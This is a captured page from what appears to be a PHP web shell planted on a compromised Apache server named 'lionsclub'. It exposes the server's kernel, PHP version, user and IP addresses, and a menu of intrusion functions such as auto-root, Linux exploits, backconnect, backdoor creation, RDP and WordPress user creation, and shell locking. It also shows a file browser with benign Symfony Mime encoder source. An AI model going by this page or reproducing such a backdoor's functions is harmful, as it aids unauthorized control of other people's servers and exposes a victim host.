Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 3.19.209.203
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lionsclub /
core /
vendor /
symfony /
mime /
Encoder /
[ HOME SHELL ]
Name
Size
Permission
Action
AddressEncoderInterface.php
689
B
-rw-r--r--
Base64ContentEncoder.php
1.3
KB
-rw-r--r--
Base64Encoder.php
1.25
KB
-rw-r--r--
Base64MimeHeaderEncoder.php
1.26
KB
-rw-r--r--
ContentEncoderInterface.php
668
B
-rw-r--r--
EightBitContentEncoder.php
834
B
-rw-r--r--
EncoderInterface.php
717
B
-rw-r--r--
IdnAddressEncoder.php
1.17
KB
-rw-r--r--
MimeHeaderEncoderInterface.php
467
B
-rw-r--r--
QpContentEncoder.php
1.78
KB
-rw-r--r--
QpEncoder.php
7.7
KB
-rw-r--r--
QpMimeHeaderEncoder.php
1.05
KB
-rw-r--r--
Rfc2231Encoder.php
1.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : QpMimeHeaderEncoder.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Mime\Encoder; /** * @author Chris Corbyn */ final class QpMimeHeaderEncoder extends QpEncoder implements MimeHeaderEncoderInterface { protected function initSafeMap(): void { foreach (array_merge( range(0x61, 0x7A), range(0x41, 0x5A), range(0x30, 0x39), [0x20, 0x21, 0x2A, 0x2B, 0x2D, 0x2F] ) as $byte) { $this->safeMap[$byte] = \chr($byte); } } public function getName(): string { return 'Q'; } public function encodeString(string $string, ?string $charset = 'utf-8', int $firstLineOffset = 0, int $maxLineLength = 0): string { return str_replace([' ', '=20', "=\r\n"], ['_', '_', "\r\n"], parent::encodeString($string, $charset, $firstLineOffset, $maxLineLength) ); } }
Close